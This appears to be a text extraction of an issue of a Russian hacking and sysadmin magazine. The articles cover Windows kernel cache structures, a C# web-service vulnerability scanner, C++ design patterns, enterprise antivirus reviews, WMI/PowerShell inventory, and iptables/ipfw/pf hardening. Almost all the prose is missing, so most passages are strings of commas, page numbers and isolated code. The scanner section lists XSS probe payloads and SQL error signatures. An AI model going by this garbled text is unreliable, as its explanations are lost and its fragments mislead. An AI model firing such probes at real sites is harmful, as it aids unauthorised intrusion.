CcCopyRead (CcFastCopyRead)

(file mapping) , .
,
, , .
CcMapData, CcPinRead,
CcPreparePinWrite .,
.

098

X 06 /137/ 10

>> coding

PRIVATE_CACHE_MAP SectionObjectPointer

, : ,
.

, , , , ,
: ,
?
,
,
. -
,

FIPS, - ( ) .
? , ,
, .
Cc*,

.
. , , , .
,
.
FILE_OBJECT,
, , -,
PRIVATE_CACHE_MAP SHARED_CACHE_
MAP. PRIVATE_CACHE_MAP
FILE_OBJECT 0x18.
FILE_OBJECT SectionObjectPointer, ,
, 0x4
SHARED_CACHE_MAP.
X 06 /137/ 10


SectionObject = ( PSECTION_OBJECT)
FindProcessSectionObject ( pEprocess );
if (MmIsAddressValid(((PSEGMENT)SectionObject->
Segment)->ControlArea))
{
FileObject = ((PSEGMENT)SectionObject->Segment)->
ControlArea->FilePointer;
FileObject = (PFILE_OBJECT)
((ULONG)FileObject & 0xfffffff8);
}

PRIVATE_CACHE_MAP, , .
SHARED_CACHE_MAP, 0x040
VACBs,
. VACB, , ,
. , ,
UNICODE_STRING, FILE_OBJECT, 0x030.
,
FILE_OBJECT, ;
.
, , .

.
Windows, , ,
. Windows
, Windows NT
File System Internals. , 1997 ,
.
, ! z

099

CODING
c0n Difesa condifesa@gmail.com, http://defec.ru

ONLINE
WEB-SERVICES: -

-
-,
.
,
-.


. -
,

.
, () XSS/SQL-inj/PHP-including. ,

,
. , //,
, ,
,
-. . , ( ), .
,
.
-
, ,
, . - -

100

.

, . , ,
,
-.

,
. ,
,
.
, , , , , .
-? , ( ,
. .). ,
, ,

,
X 06 /137/ 10

>> coding

-

. ,
, .

,
-. . Web-service , :
1) -;
2) HTTP-
- ;
3) -
.
Microsoft,
Microsoft .NET. ,
- .NET Framework:
- -.
, .NET
Remoting
. -
MS.
HTTP SOAP (Simple Object Access
Protocol). , .NET Framework ,
,
. , C#,

, ASP.NET -
.NET. ,
.
, -
CrossSite Scripting ( XSS),
(
). , ,
.

X 06 /137/ 10

-,

. .
:
1. ;
2. ;
3. , ;
4. , ;
5. ( ).
, ,
:
, ,
.

,
, .NET
Framework Visual Studio,
,
.
ASP.NET Web Service Application
,
, .
:
1. ASPX-, web-;
2. ASMX-, , , web;
3. Web.config,
;
4. Global.asax, ;
5. DLL,
.
ICholeScaner.asmx, (
), -

DVD
dvd



Microsoft Visual
Studio 2008.

HTTP://WWW
links

forum.antichat.ru/
thread20140.html

XSS-.
.
www.w3.org/TR/
soap/ -
SOAP.
, ,
-.
defec.ru - ,
, ,

.

101

CODING


HTTP- GET POST, :
GET /icholescaner.asmx/StartScan?domen=www.enemysite.
com HTTP/1.1
Host: www.site.com

, - ( , ),
, -, .
,
, XSS-.

, !

-
- .NET Framework.
:
ASMX-
<%
@ WebService Language="C#"
CodeBehind="~/App_Code/ICholeScaner.cs"
Class="ICholeScaner"
%>

@WebService Class, , -, CodeBehind,


- .
- ICholeScaner.cs
ICholeScaner [WebMethod].
.NET Framework
.
[WebMethod]
public string StartScan(string domen)
{
//

-
( , ) ,
, , - ,
(), HTTP SOAP. SOAP XML-
HTTP .
- StartScan,
,
. URL ,
, www.site.com/icholescaner.asmx,
StartScan, SOAP- HTTP-. :
1. SOAP-, ;
2. ;
3. SOAP-, ;
4. HTTP-.

102

, ,
,
. ,
( JavaScript-),
, .
XSS-: .
: ,
,
(,
). , , ,
, .
,
, , -.
, .
, ,
, . , ?
, .
, URL- ,

- .
:
HTML-
//
WebRequest request =
WebRequest.Create(Url+"?"+Parametrs);
//
WebResponse response = request.GetResponse();
//
StreamReader reader = new
StreamReader(response.GetResponseStream());
Content = reader.ReadToEnd();
reader.Close();

,
, ,
. :
- HTML- "/script.
php?a=abcd&b=1234", script.php .
.
X 06 /137/ 10

CODING

,
, .
, ,
,
,
JavaScript- ..
XSSrequest. :
string[] XSSrequest =
{ "<script>alert()</script>",
"<IMG SRC=\"javascript:alert();\">",
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>",

, JavaScript-.
, HTML-,
, .

SQL-INJ, PHP-INC

, ,
, .
, , SQL- ,
.
, ,

, ,
. ,
,
( HTML- + ).
SQL-,
:
string[] SQLErrors = { "mysql_fetch",
"mysql_query", "\\[obdc", "mysql error",
"you have an error in your sqlsyntax",
"odbc drivers error", "\\[microsoft sql"

XSS-
...
};

SQL-,
, , . , ,
.

- . - ,
()
. - , -
, -
, ,
. - ,
,
,
.
!. z

104

X 06 /137/ 10

CODING
deeonis deeonis@gmail.com

C++

3- .
, .
.

.
,
.
- - , .

- .

-
healthValue, , ,
.

-, healthValue
:
healthValue
class GameCharacter {
public:

106

//

//

virtual int healthValue()
const;

};

,
healthValue ,
,
.
,
.


.

,

.

healthValue ,
, doHealthValue,
.

class GameCharacter
{
public:
int healthValue() const
X 06 /137/ 10

{
//

int retVal = doHealthValue();


//
...
}
private:
//
//
virtual int doHealthValue() const
{

}
};

, -.
non-virtual
interface idiom (NVI).
.
healthValue
.
NVI ,

. ,
,
. , ,
. ,
, ..
, .
,
.
,
doHealthValue , , , , . ,
:

.
X 06 /137/ 10

-
, . ,
doHealthValue
, . ,
NVI .



NVI
, , ,
-
.
, ,
, . ,
,
. , ,
.

//
class GameCharacter;
//
int defaultHealthCalc(const GameCharacter&);
class GameCharacter {
public:
typedef int (*HealthCalcFunc) (const
GameCharacter&);
explicit GameCharacter(HealthCalcFunc
hcf = defaultHealthCalc)
: healthFunc(hcf)
{}
int healthValue() const
{return healthFunc(*this);}

private:
HealthCalcFunc healthFunc;
};

, .

107

CODING

, GameCharacter,
.
,
.

class EvilBadGay: public GameCharacter {
public:
explicit EvilBadGay(HealthCalcFunc
hcf = defaultHealthCalc)
: GameCharacter(hcf)
{}

};
//
int loseHealthQuickly(const GameCharacter&);
int loseHealthSlowly(const GameCharacter&);
//
//
EvilBadGay ebg1(loseHealthQuickly);
EvilBadGay ebg2(loseHealthSlowly);

,

. ,
GameCharacter - setHealthCalculator,
.
. , -
GameCharacter, ,
, .
,
, . , .
, ,
, ,
GameCharacter. , ,
. ,
- ,
.
,
.


tr1::function
tr1::function
-

108

. tr::function
( ,
-),
. tr1::function:
tr1::function
class GameCharacter;
int defaultHealthCalc(const GameCharacter&);
class GameCharacter {
public:
//
//
//
//
//

HealthCalcFunc
,
,
GameCharacter,
int

typedef std::tr1function<int (const


GameCharacter&)> HealthCalcFunc;
explicit GameCharacter(HealthCalcFunc
hcf = defaultHealthCalc)
: healthFunc(hcf)
{}
int healthValue() const
{
return healthFunc(*this);
}

private:
HealthCalcFunc healthFunc;
};

, HealthCalcFunc typedef, tr::function. ,


. HelthCalcFunc
, .
,
const GameCharacter&, int.
, GameCharacter ,
. , ,
,
:
tr1::function
//
short calcHealth(const gameCharacter&)
// ,
//
X 06 /137/ 10

stuct HealthCalculator {
int operator() (const GameCharacter&) const
{}
};
class GameLevel {
public:
// -
float health(const GameCharacter&) const;

};

- , . :

//
class GameCharacter;
class HealthCalcFunc {
public:

virtual int calc(const GameCharacter& gc)const


{}

class EvilBadGay: public GameCharacter {

};
class EyeCandyCharacter: public GameCharacter {

};

};

EvilBadGay ebg1(calcHealth);

class GameCharacter {

EyeCandyCharacter ecc1(HealthCalculator());

public:
explicit GameCharacter(HealthCalcFunc
*phcf = &defaultHealthCalc)
: pHealthCalc(phcf)
{}

GameLevel currentLevel;

HealthCalcFunc defaultHealthCalc;

EvilBadGay ebg2(
std::tr1::bind(&GameLevel::health,
currentLevel,
_1)
};

int healthValue() const


{return pHealthFunc->calc(*this);}

private:

ebg2 - GameLevel.
GameLavel::health , ( GameCharaster), ,
GameLevel ,
this.
. GameLevel::health, -
,
.
ebg2 GameLevel
currentLevel, GameLevel::health.
tr1::bind ,
ebg2 GameLevel
currentLevel.


, X 06 /137/ 10

HealthCalcFunc *pHealthFunc;
};

GameCharacter , EvilBadGay
EyeCandyCharacter .
HealthCalcFunc ,
SlowHealthLooser FastHealthLooser.
GameCharacter HealthCalcFunc.
,

HealthCalcFunc.

: ,
, .
C++ .
! z

109

SYN/ACK
grinder grinder@synack.ru




. , , .
.
,
, ,
,
.
?

, ,
,
: , , .
,
,
.

,
, , , ,
( ).


.
,
.
,
,
.

-,


.
SQL,
,
,

110

.
-
.
.
:
,
(, IIS SQL
Server), , . , ,
.
.

:
Kaspersky Open Space Security (KOSS, kaspersky.
ru)
;
Dr.Web Enterprise Suite (ES, drweb.com)
Windows, Unix
;
ESET NOD32 Smart Security Business Edition
(SSBE, esetnod32.ru)
Windows Linux;
avast! Enterprise Suite (avast.com/ru-ru)
Windows, Windows Linux ,
Kerio Mail/WinRoute;
Symantec Endpoint Protection (SEP, symantec.
com/ru) Symantec
AntiVirus Corporate Edition .


Kaspersky Open Space Security
KOSS ( 20),
:
(Windows XP Se7en 32/64-bit,
Linux), (Symbian), , (Sendmail, Qmail, Postfix,
Exim, Exchange, Lotus)
(Windows, Linux, NetWare). Kaspersky
Administration Kit. , .

, .

,
.
Windows/Linux Workstation,
,
, IDS/IPS, ,
.
, KOSS
Cisco NAC Microsoft NAP ( NAP
, ][
12.2008).
X 06 /137/ 10

Dr.Web Enterprise Suite


Dr.Web ES 5.0
Windows (Win95 Win7, 32-bit, 32/64-bit),
Unix (Linux, FreeBSD 7.1, Solaris).

, ,
. , , Dr.Web . ( )
, . /
-. 5.0
.
, . ,
,
, - (
).
NAP Validator, NAP.
ESET NOD32 Smart Security Business Edition
ESET , , . NOD32,
. ThreatSense,
/
, . -. ThreatSense
(MS Outlook,
Thunderbird, The Bat! ).
Smart Security . , ,
X 06 /137/ 10

,

.
32 64- Windows 2000 Se7en (
Server), Linux/BSD/Solaris Novell Netware. ESET Remote
Administrator.

avast! Enterprise Suite


ALWIL Software, avast! Free antivirus.
avast! Professional Edition ( NetClient Edition
ADNM),
, .
,
, P2P IM-,
-. Network Shield, ,
.
Windows 95 Vista, 64- . .
, : Windows ( Exchange,
ISA, Sharepoint ..) Linux/Unix, Kerio PDA.
avast! Distributed
Network Manager (ADNM).
Symantec Endpoint Protection
SEP Norton Antivirus.
, ,
32/64- Win 2k Se7en ( ), Linux, Novell
Open Enterprise Server (OES/OES2) VMWare ESX. , , :
, , , IPS . -

111

SYN/ACK

Dr.Web ES

Kaspersky Administration Kit


VxMS (Veritas Mapping Service)
;
Proactive ThreatScan
.
,
Symantec Endpoint Protection Manager,
, , ,
,
.
Network Access Control,

. ,


.
.


Kaspersky Open Space Security
.
Kaspersky
Administration Kit,
(),
( ) . , ,
,
,

Microsoft Forefront
Client Security

, . Microsoft Forefront
Microsoft Forefront Client Security ( Microsoft
Client Protection, microsoft.com/forefront/clientsecurity/ru/ru), . , ,
.
Windows Defender OneCare,
, .
Win2k3/Win2k8, Win 2k+. ( ) .
Microsoft. Windows Update ( WSUS),
GPO.
, , .
, .

112

.
,
.
. ,
;
()
.
Win 2k/2k3/2k8/XP/Vista,
MS SQL Server, MSDE/Express
MySQL. ,
MSDE
.

.
,

.
,
.

,
,
.

Dr.Web Enterprise Suite


, Dr.Web
;
,
. , SQL
.
Kaspersky Administration Kit.
,
.
( ),

.

Java, Windows
2k/XP/2k3/2k8, Linux, FreeBSD Solaris.
X 06 /137/ 10

- Dr.Web
Enterprise Suite
IntDB
( ) MS SQL
Server CE, Oracle ( ODBC), Linux
PostgreSQL.

. ,
,
. -
,
. , 9080/9081 (HTTP/HTTPS).
Java.

ESET NOD32 Smart Security Business Edition



ESET Remote Administrator (ERA),
(ERAS) (ERAC), .
, .

,
. ERAS,
.
, ; ,
; . ,
, - - -
. ESET Remote Administrator Server
( 2222) .
ERAC.
,
, .
ESET
XML-, , ERAC
. Active
Directory. ESET SysInspector,
(,
, ..), ESET SysRescue,
NOD32 ( WAIK,
][ 01.2009).
ERAC , -
. ERAS
Windows NT4 2k8/Se7en
X 06 /137/ 10

ERAC
( ), ,
NT4. MS Access, MS
SQL Server, Oracle MySQL. , ERAS
( ),

.

avast! Enterprise Suite


avast! ADNM
Management Server,
.
,
32/64- WinNT/2k/XP/2k3/Vista/2k8.
MS
SQL' .
:
(dedicaded) . MSDE 2000 (
1000 ), MS SQL Server 2k/2k5 ( 2k5 Express
Edition).
: PUSH POP. ,
, ,
.
(AMS service, AvEngine.
exe) , ,
HTTP/S ( httpd.exe).
.
.
, , .

.
,
avast!
.
Administrator admin.

WARNING

warning
MSDE 2000 64-
.

DVD
dvd



,

ESET NOD32 SSBE.

HTTP://WWW
links
kaspersky.ru

drweb.com
ESET NOD32
esetnod32.ru
avast! avast.
com/ru-ru
Symantec
symantec.com/ru

113

SYN/ACK

avast! ADNM
Symantec Endpoint Protection
Symantec Endpoint Protection
: Manager (), Console Database. Manager', .
Win2k/XP/2k3/2k8 (32/64-bit). ,
, Vista/Se7en. SQL' ( Sybase),
100
( ).

SQL- MS SQL Server 2kSP4/2k5SP2/2k8.
IIS, Manager.
( 510 ), .
Java-, ( ). , .
. ,
, ,
,
SEP.

Symantec' . 30 : , IP-,
CPU, BIOS .

114

Symantec Endpoint Console



, ,
,
. ,
.z
X 06 /137/ 10

SYN/ACK
_ssh3r1ff- ssh3r1ff@gmail.com



IDECO ICS
. ? , , . . , .
.
, , ,
: .
- Ideco ICS.
, -
.
-
(
,
), Ideco.
(,

) ,
.
,
Ideco ICS
VMware Player. , ,
.


?
Linux,
,
. -
, , ,
,
. ,
-
,
:). ,

116

,
, ,
,
. ,

. ,
, , ... !


][ (
PDF- ). Ideco Control
Server .

?
? :) . ,
.
,
, e-mail,
. Ideco
.

?
. Ideco ICS
Linux 2.4 (, )
, -

: Apache,
ClamAV, Courier, Cyrus, Postfix, MySQL ..

, ,
- ,
. : ,
Ideco,
VPN, DHCP, DNS, FTP, NTPD, Jabber
SMTP/POP3 IMAP-.
Joomla phpbb
-.
all in one
. ,
? :
, ,
.
. C 2.4
.
, , SkyStar3?
2.6 , 2.4
. ,
: ,
DVB-. ,
, ,
. 3G WiMax-,
USB. , .
X 06 /137/ 10

eBox (ebox-platform.com), , .
Ubuntu ,
. C Ideco ,
, , ,
WiMax Yota.

?
: . , , Ideco .
:
NAT, -, , ,
firewall, , ,
. , ,
.
- .
,
memtest'. ? ,
, Ideco ? :) ,
, curses-, .
,
, .
,
, ,
. Ideco ICS
. 1.5 CPU, 256 RAM,
.
,
. ,
X 06 /137/ 10

curses- IP-.
Ideco IS , ,
-. IP',
, ( servicemode)
. ,
, ,
. , ,
, , . WAN. , L2TP. , Ethernet- PPPOE,
VPN (PPTP) , L2TP .
PPTP . ADSL
WiMAX Ethernet,
USB-, , Ideco .
:
. ,
,
,
Ideco ICS DNS. ,
, .

-

- AJAX ( Opera -
). , Ideco ICS
: ,
.
.
. ,

117

SYN/ACK

Ideco ICS
,
: , (
, , ), , ,
, .
DNS
. -
, . : -,
FAQ, IdecoAgent, VPN Win98/2000/
XP/2003/Vista/7.
,
FireFox,
IE, Opera, Miranda Thunderbird.
, .
.



, ,

.
,
: IP, IP+MAC,

118

PPPoE PPTP.
(, )

IdecoAgent,
. ,
Active Directory, Ideco ( LDAP).
, :).

.
:).

, ,
.
-
.
,
:). ,
, ,
,

. ,
,
NAT,
VPN , , ,

, Jbber e-mail
.
.
,
. ,
(--!).


,
,


:). , , . :). , . ,
ICS Manager,
Ideco
ICS. ? :) . ,

.
,
. ,
Ideco ICS . , IP-
.
(
).
,
, . ,
,
,
. , -
.

. .
IP- (
-, ),
IP-,
.
,
, . ,
, .
X 06 /137/ 10

firewall
Squid.
, - - .
, , ,
, :).


, ,
-, :
chroot
. ,
Linux
( , , ACL-
), , . ,
,
10 .
SSH,
.
, IP .
firewall: ( ) , .
, iptables.
: IP , , , , , , , .
, /
.
,
, 15 .

.
.
,
. ,
, ,
- ,
. Ideco
. .
-> . ,
, .
, :).
.
-> ->
CD CD ,
.
X 06 /137/ 10


INFO

info


Ideco ICS
?
, .
eBox Ideco ICS, . eBox
, .
, ,
. ,
,
. ,
- ,
? , Ideco
. , ,
- , ,
. , ,
, , ,
. , :
, ,
,
. , ,
. , - . : Ideco ICS
, - ,
,
, . Ideco ICS
.
.z





][
07.2009.

Linux
, ][
2010 .

DVD
dvd



,


Ideco ICS
.

HTTP://WWW
links

Ideco ICS
ideco-software.ru

119

SYN/ACK
grinder grinder@synack.ru

,
IT-
. ,
. , , . ,
.
WMI POWERSHELL
WinNT 4.0SP4

WMI
(Windows Management Instrumentation,
Windows).
,
( 15).
Win2k+ .
WMI Windows,
Se7en. WMI ,
.

VBScript, JScript ,
,
PowerShell,

( PS ][ 09.2009
05.2010).
BIOS :
PS> Get-WMIObject Win32_BIOS
-computerName synack.ru

, '-computerName' .
,
.
,

120

Get-WMIObject ,
.

.
. ,
CPU:
PS> Get-WMIObject Win32_Processor

, , ,
:
PS> Get-WmiObject Win32_
ComputerSystem | Select
Manufacturer, Model

PS> Get-WmiObject Win32_


OperatingSystem | Select CSName,Buil
dNumber,ServicePackMajorVersion


, Export-CliXML C:\check.xml,
:
PS> Import-CliXML C:\check.xml |
Out-GridView

Win32_* MSDN Win32_Classes


(http://msdn.microsoft.com/en-us/library/
aa394084%28v=VS.85%29.aspx). . , ,
disk:

, :
PS> Win32_Baseboard | Select
Manufacturer, Name, Product | ft -a

Win32_ComputerSystem,
Win32_ComputerSystemProduct Win32_
OperatingSystem
:
PS> "127.0.0.1", "synack.ru", "pc01" | Check-Online |
Foreach-Object { Get-WMIObject
Win32_ComputerSystem -computerName
$_ }

PS> Get-WmiObject -List | where {$_.


name -match "disk"}


,
WMI-
,
.
HTA-
Hardware Inventory (www.robvanderwoude.com/
hardware.php) -.
.
,
( WMI- VBScript).
X 06 /137/ 10

,
. Computer Inventory Script
(CompInv), powershellpro.com,
,
Excel' .
, ,
.
,
, .
.
, , Yes Would you like to use an
alternative credential?, .
,
SchTasks. :
> SchTasks /CREATE /TN CheckScript /TR "powershell.exe `
-noprofile -executionpolicy Unrestricted `
-file check.ps1" /IT /RL HIGHEST /SC DAILY

CheckScript,
PS- check.ps1, .
NetPoint (www.neutex.net) PS- (GetNet*),
. ,
:
PS> Get-NetLogicalDisk -DriveType "Local Disk"
| where { $_.FreeSpace / $_.Size -lt .10 } | % {
$_.ComputerSystemName }

:
PS> Get-NetProgram -System synack.ru -Uninstalled $False
X 06 /137/ 10

| % { $_.DisplayName } | sort -unique

20 .
NetPoint Express Edition,
32/64- WinXP/2k3/2k8/Vista/Se7en,
. NetPoint PS 2.0, IIS
SQL- ( Express Edition).
, , :
PS> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\
Windows\CurrentVersion\Uninstall\* | Format-Table
DisplayName,Publisher | Out-GridView

Out-GridView .


WMI/PowerShell ,

. , , , .
, Microsoft
SCCM (System Center Configuration Manager),
08.2009, 09.2009 01-02.2010. , *nix ,
, , WMI
. ,
. (
), ,
.
MYZCI
, zCI (zci.sf.net),
,

121

SYN/ACK


OutGridView
,
mysqlscript.sql, engine.

:

WMI-
. , ,
. ,
- SQL-
.
MyZCI (sf.net/projects/myzci)
zCI. ,
zCI :
,
(,

GLPI

) . MyZCI PHP ( PECL, PHP Extension


Community Library) MySQL.
myzci-1.2.1.zip
- zciconfig.php
MySQL:
$ sudo nano zciconfig.php
return dbx_connect(DBX_MYSQL,"local
host","zci","zci","passwd");

GLPI (Gestion Libre de Parc Informatique, glpi-project.org) , .


,
, . OCSNG,
, -. , GLPI OCSNG. .
- OCSNG .
OCSNG, .
GLPI , , , . IT- . ,
. GLPI
. , ,
, .
PDF, CSV
SLK. iCal, Webcal.
,
(plugins.glpi-project.org). OCSNG
Cacti Nagios.
GLPI *nix .
, PHP
- MySQL.

122

$ sudo nano mysqlscript.sql


create database zci;
...
grant all on zci.* to
'zci'@'localhost' identified by
'passwd';
#
,
# grant select,delete,insert,update
on zci.* to 'zci'@'%' identified by
'zci';

$Lang ru
langconfig.php.
Windows-
Windows Script Host, Linux
lshwclient Java.
add-ons engine. MS
Windows Scripting Host 5.6 MS WMI Core 1.5,

Win95/98/NT4.
takedata.js lshwclient.java
MyZCIpath
MyZCIserver, URL .
. , install.sh,
Linux,
lshw, jdk read-edid (
) .
Java- cron.
MyZCI
,
.

MyZCI.
.

.
,
,
X 06 /137/ 10

DVD
dvd

Hardware Inventory
,
(, ), .
(, ) .

OCS INVENTORY NG
OCS Inventory NG (OCSNG, Open Computers and
Software Inventory New Generation, ocsinventory-ng.org)

,
, , .
.
-.
Windows 95

OCSNG/GLPI

OCSNG ,
, ,
, Windows, .
, OCSNG ISO-8859-1 ( CP1251), GLPI UTF8. OCSNG
-> GLPI . :
1. . ,
export.function.php
ttf2pt1 ,
UTF8.
2. OCSNG UTF8.

Windows.
ftp://linvinus.ru/ocs. deb- Ubuntu/Debian.
, inc/ocsng.class.php
$this->dbenc="latin1";
$this->dbenc="utf8"; /etc/php5/apache2/
php.ini default_charset =
"utf-8".
X 06 /137/ 10

,
OCSNG
2k8R2, Linux, Mac OS X, *BSD, Solaris, IBM AIX HP-UX.

(management server) XML-,
Zlib.
HTTP/HTTPS, firewall' .
"IP discovery", , ,
, (, , web- ..)

.
Windows C++, *nix
Perl .
OCSNG ,

. (MySQL) , , :
HTTP
-
(Apache 1.3.X/2.X Perl, Debian/Ubuntu
libapache-dbi-perl);

- ( - SSL);
(- PHP ZIP GD).
OCSNG , Win2k/XP/2k3, Linux,
*BSD, Solaris, IBM AIX MacOS X.

OCSNG
, .
. setup.sh, ,

, .
Debian/Ubuntu :
$ sudo apt-get install libapache2-mod-perl2
libdbi-perl libapache-dbi-perl libdbd-mysqlperl libsoap-lite-perl libxml-simple-perl
libnet-ip-perl libcompress-zlib-perl php5-gd

XML::Entities CPAN:



, ,

OCSNG + GLPI.

HTTP://WWW
links

Win32_*

MSDN
Win32_Classes
msdn.microsoft.com

NetPoint neutex.net
MyZCI
sf.net/projects/myzci
zCI
zci.sf.net
OCSNG
ocsinventory-ng.org

INFO

info

,

,
WMI
,


.

123

SYN/ACK

OCSNG

$ sudo cpan -i XML::Entities


-. , OCSNG, ,
post_max_size upload_max_
filesize /etc/php5/apache2/php.ini ( 8 2 )
ocsinventory-reports.conf.
http://localhost/ocsreports/install.php,
.
ocsweb ocs ocs.
,
. Linux Perl (XML Zlib) dmidecode.
$ sudo apt-get install libcompress-zlib-perl libnet-ipperl libnet-ssleay-perl libwww-perl libxml-simple-perl
po-debconf ucf dmidecode pciutils

Perl'
:
$
$
$
$
$

tar xzvf Ocsinventory-Agent-1.1.2.tar.gz


cd Ocsinventory-Agent-1.1.2
perl Makefile.PL
make
sudo make install

. , (
), cron.
.
Success!,
. -, . /var/lib/ocsinventory-agent XML-,
.
, :
$ ocsinventory-agent -l /tmp debug --server http://
ocsng-server/ocsinventory

.
Windows . logon .

124

GLPI OCSNG
OCSNG.
, . :
IP- OCSNG , ,
, Immediately launch inventory.
.

OCSNG
, , , . .
Add column 23 .
, .
.
, OCSNG
(bat, vbs ..)
. Deployment Build
New package building: , Priority ( )
Action. :
- Store ;
- Execute ;
- Launch .

User notifications .
Deployment Activate.
URL . ,
, Customization
Add package.
Affect. Customization,
Activate.
OCSNG , ,
. ,
ocsinventory-agent.


. , , , ,
.z
X 06 /137/ 10

j1m@synack.ru

IPTABLES, IPFW PF
, , .
, 99% .

.



.

() (, ssh).



,

.
nmap,

.
nmap,
:
nmap,

-sT TCP-
;
-sS SYN/ACK-,

;
-sU UDP-;
-sF FIN;
-sX FIN, PSH URG;
-sN .


X 06 /137/ 10

.
,
. , ssh, samba apache,
-
-,
:
iptables
outif="eth1"
iptables -F
iptables -i $outif -A INPUT \
-m conntrack \
--ctstate ESTABLISHED,RELATED \
-j ACCEPT
iptables -i $outif -A INPUT -p tcp \
--dport 80 -j ACCEPT
iptables -i $outif -P INPUT DROP
iptables -i $outif -P OUTPUT ACCEPT
ipfw
outif="rl0"
ipfw add allow ip from any to any \
via lo0
ipfw add allow ip from me to any \
via $outif
ipfw add allow tcp from any to me \
established via $outif
ipfw add allow tcp from any 80 \
to me via $outif
ipfw add deny ip from any to any \
via $outif
pf
outif="rl0"
set skip on lo0
block all
pass out on $outif from $outif \

to any keep state


pass in on $outif proto from any \
to $outif port 80



(loopback),
(, ,

), 80- ,
,
. ,
iptables ipfw
(established), pf
keep state
,
.
-,

,
,
.
(
nmap '-sT', '-sS' '-sU') ,
, , '-sN', '-sF'
'-sX', ,
.
.


# FIN-
Linux> iptables -A INPUT p tcp \

125

SYN/ACK

m tcp \
-tcp-flags FIN,ACK FIN -j DROP
FreeBSD> ipfw add reject tcp from any to any \
not established tcpflags fin
# X-
Linux> iptables -A INPUT p tcp m tcp \
--tcp-flags FIN,SYN,RST,PSH,ACK,URG
FIN,SYN,RST,PSH,ACK,URG \
j DROP
FreeBSD> ipfw add reject tcp from any to any \
tcpflags fin, syn, rst, psh, ack, urg
# N-
Linux> iptables -A INPUT p tcp m tcp \
-tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE j DROP
FreeBSD> ipfw add reject tcp from any to any \
tcpflags !fin, !syn, !rst, !psh, !ack, !urg

OpenBSD
/etc/pf.conf:
scrub in all

scrub ,
, .
scrub
( )
DoS-.
SYN/ACK-,
nmap- '-sS',
(OS Fingerprint), pf iptables/netfilter
( 1.4.6).
( '-sT') nmap ,
( ),
SYN/ACK- nmap ,
, . -

126


:
OpenBSD> block in quick from any os NMAP
Linux> iptables -I INPUT -p tcp -m osf --genre NMAP \
-j DROP

osf iptables/netfilter ,
OpenBSD (/etc/pf.os),
.
, nmap ( '-O').
,
'-sT'. ?
. , .
, .
. iptables ,
,
:
iptables
# (10 )
iptables -A INPUT -m recent --rcheck \
--seconds 3600 --hitcount 10 --rttl -j RETURN
# (2 )
iptables -A INPUT -m recent --rcheck \
--seconds 60 --hitcount 2 --rttl -j RETURN
#
iptables -A INPUT -m recent --set
# ,

iptables -P INPUT -j DROP

xtables-addons, patch-omatic, PSD (Port Scan Detect), scanlogd.


:
X 06 /137/ 10

FWBuilder: GUI
iptables, ipfw, pf
ipf


# iptables -A INPUT -m psd -j DROP

, ipfw pf
, ,
PortSentry scanlogd.

ICMP-

ICMP-,


(, ).
ICMP-:
ICMP-
0 echo reply (echo-, )
3 destination unreachable (
)
4 source quench ( ,
)
5 redirect ()
8 echo request (echo-, )
9 router advertisement (
)
10 router solicitation ( )
11 time-to-live exceeded ( )
12 IP header bad ( IP )
13 timestamp request ( )

14 timestamp reply (
)
15 information request (
)
16 information reply ( )
17 address mask request (
)
18 address mask reply (
)

, ICMP-
,
, .

ICMP- 0, 3, 4, 11 12,
3, 8 12.
:
ICMP-
Linux> iptables -A INPUT -p icmp \
-icmp-type 3,8,12 -j ACCEPT
Linux> iptables -A OUTPUT -p icmp \
-icmp-type 0,3,4,11,12 -j ACCEPT
FreeBSD> ipfw add allow icmp \
from any to $outif in \
via $outif icmptype 3,8,12
FreeBSD> ipfw add allow icmp \
from $outif to any out \
via $outif icmptype 0,3,4,11,12
OpenBSD> pass in inet proto icmp \
from any to $outif \


TARPIT
,
conntrack:
# iptables -t raw -I PREROUTING -p tcp --dport 25 -j NOTRACK
X 06 /137/ 10

icmp-type { 3, 8, 12 } keep state


OpenBSD> pass out inet proto icmp \
from $outif to any \
icmp-type { 0, 3, 4, 11, 12 } \
keep state

ICMP, -,
.


, , ,
.
,

.
, IP-.
iptables:

iptables
#
iptables -N brute_check
# , 60
2-
iptables -A brute_check -m recent \
--update --seconds 60 \
--hitcount 3 -j DROP
#

iptables -A brute_check -m recent \
--set -j ACCEPT
# INPUT
iptables -F INPUT
# brute_check
,
22-
iptables -A INPUT -m conntrack \
--ctstate NEW -p tcp \
--dport 22 -j brute_check
iptables -P INPUT DROP

pf:

127

SYN/ACK

iptables

WARNING
warning

nmap osf,

,

: SunOS 4.1.x,
Tru64 6.1, TOPS-20
version 7, ExtremeWare
4.x, SymbianOS 6048,
Sega Dreamcast
Dreamkey 3.0.

HTTP://WWW

pf
#
table <bruteforcers> persist
# ,
block in quick from <bruteforcers>
# bruteforcers ,
22-

pass in on $ext_if inet proto tcp to $outif \
port 22 flags S/SA keep state \
(max-src-conn-rate 60/2, \
overload <bruteforcers> flush)

ipfw ,
,
PAM,
sshguard.

( )
links
DoS- . sf.net/projects/
, sentrytools
(,
PortSentry
,
www.openwall.com/
)
scanlogd scanlogd
( ,
). ,
,
.
INFO
, ,

(, ).
info
, ,
,
.
DoS/DDoS
TCP- ,


. , ,
,
,
- , UDP,
.
][ 2009 .

128

netfilter Linux
, .

, (, ssh)
(
).
, , ( ).
. , , .. .
,
,
. ,
.
,

, :
Linux> iptables -A INPUT -i $outif \
-s 192.168.1.0/24 -j DENY
FreeBSD> ipfw add deny ip from \
192.168.1.0/24 to any via $outif
OpenBSD> block in on $outif from \
192.168.1.0/24 to any
X 06 /137/ 10

pf

www.netfiler.org: iptables/
netfiler
(
) ipfw pf
Linux:
Linux> echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
FreeBSD> ipfw add deny ip from any to any not antispoof in
OpenBSD> antispoof quick for $ext_if

. ,
,
.

IPTABLES

iptables/netfilter,
.
, (port knoking).
,
.
, SSH 10 27520-
:
iptables port knocking
#
iptables -N knock
# ,
10
iptables -A knock -m recent --rcheck --seconds 10 \
-j ACCEPT
# INPUT
iptables -F INPUT
# ,
iptables -A INPUT -m conntrack \
--ctstate ESTABLISHED,RELATED -j ACCEPT
# 22-
knock
iptables -A INPUT -m conntrack --ctstate NEW \
-p tcp --dport 22 -j knock
# 27520-
iptables -A INPUT -m conntrack --ctstate NEW \
-p tcp --dport 27520 -m recent --set
X 06 /137/ 10

#
iptables -A INPUT -m conntrack --ctstate NEW -p tcp \
-m multiport --dport 27519,27521 -m recent --remove
#
iptables -P INPUT DROP

.
10 22- ,
.
. , 22- ,
,
.
iptables xtables-addons
